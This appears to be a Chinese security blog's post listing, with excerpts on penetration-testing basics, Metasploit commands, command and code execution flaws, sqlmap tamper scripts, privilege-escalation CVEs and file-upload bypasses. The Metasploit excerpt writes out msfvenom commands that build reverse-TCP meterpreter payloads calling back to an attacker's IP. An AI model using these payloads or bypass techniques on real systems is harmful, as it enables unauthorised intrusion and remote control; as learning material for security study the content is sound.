自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(8)
  • 收藏
  • 关注

原创 基础

基础一、常用术语脚本(asp,php,jsp)html(css,js,html)HTTP协议CMS(B/S)MD5信息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位的散列值(hash value),用于确保信息传输完整一致。抓鸡利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为。跳板使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息。一句话通

2020-10-20 23:59:44 511

原创 MSF命令大全

0x00 Payload生成Windows/LinuxWindows:msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名WebPHP:msfvenom -p php/meter

2020-10-20 23:59:00 5926

原创 命令执行漏洞

命令执行漏洞漏洞描述命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一。如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致,可以执行命令的函数有system( )、exec( )、shell_exec( )、passthru( )、pcntl_execl( )、popen( )、proc_open( )等。当攻击者可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击。PHP执行命令是继承WebServer用

2020-10-20 23:58:12 1366

原创 sqlmap常用绕过脚本

使用方法–tamper xxx.pyapostrophemask.py用UTF-8全角字符替换单引号字符apostrophenullencode.py用非法双字节unicode字符替换单引号字符appendnullbyte.py在payload末尾添加空字符编码base64encode.py对给定的payload全部字符使用Base64编码between.py分别用“NOTBETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”bluec

2020-10-20 23:57:37 1299

原创 MSF常用命令

Msf是kali下的这款强劲的专用工具,开源系统的网络安全问题测试工具前渗入后渗入环节都用获得,只有還是后渗入环节用的多。Msf用途大概就是说exploit进攻,cve进攻,远程控制木马病毒进攻运用。Msfconsole 开启msfMsfconsole -h 协助选择项Banner 用以查询metasploit的版本信息,运用控制模块总数、payload总数控制模块详细介绍:Exploits 渗入进攻控制模块 主要用于进攻方式Auxiliary 輔助控制模块 主要用于信息内容搜集Payloa

2020-10-20 23:56:41 2635

原创 EXP查询合集提权后渗透必备-------后渗透提权常用漏洞

后渗透提权常用漏洞CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects inmemory] (Windows 7/8/10/2008/2012/2016/2019)CVE-2018-8639 [An elevation of privilege vulnerability exists in

2020-10-20 23:55:59 687

原创 代码执行

代码执行当应用在调用一些能将字符转化为代码的函数(如PHP中的eval)时,没有考虑用户是否能控制这个字符串,这就会造成代码执行漏洞。成因:应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。概念:代码的执行来自于缺乏严格的过滤活着用户控制数据的逃逸。在这里由于攻击者可以控制部分或者所有内容传递给这些未进行严格过滤的函数,从而导致提交的内容会被作为PHP代码执行分类常见敏感函数(代码执行函数)eval()

2020-10-20 23:54:27 410

原创 浅析文件上传漏洞

文章目录文件上传成因客户端校验服务器校验原理危害防御解析漏洞文件上传成因对于上传文件的后缀名(扩展名)没有做较为严格的限制对于上传文件的MIMETYPE 没有做检查权限上没有控制对于上传的文件的文件权限,(尤其是对于shebang类型的文件)对于web server对于上传文件或者指定目录的行为没有做限制客户端校验前段js验证可通过审计修改js代码或burp改包绕过服务器校验content-type字段校验将Content-Type修改为image/gif,或者

2020-10-20 23:50:44 458

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除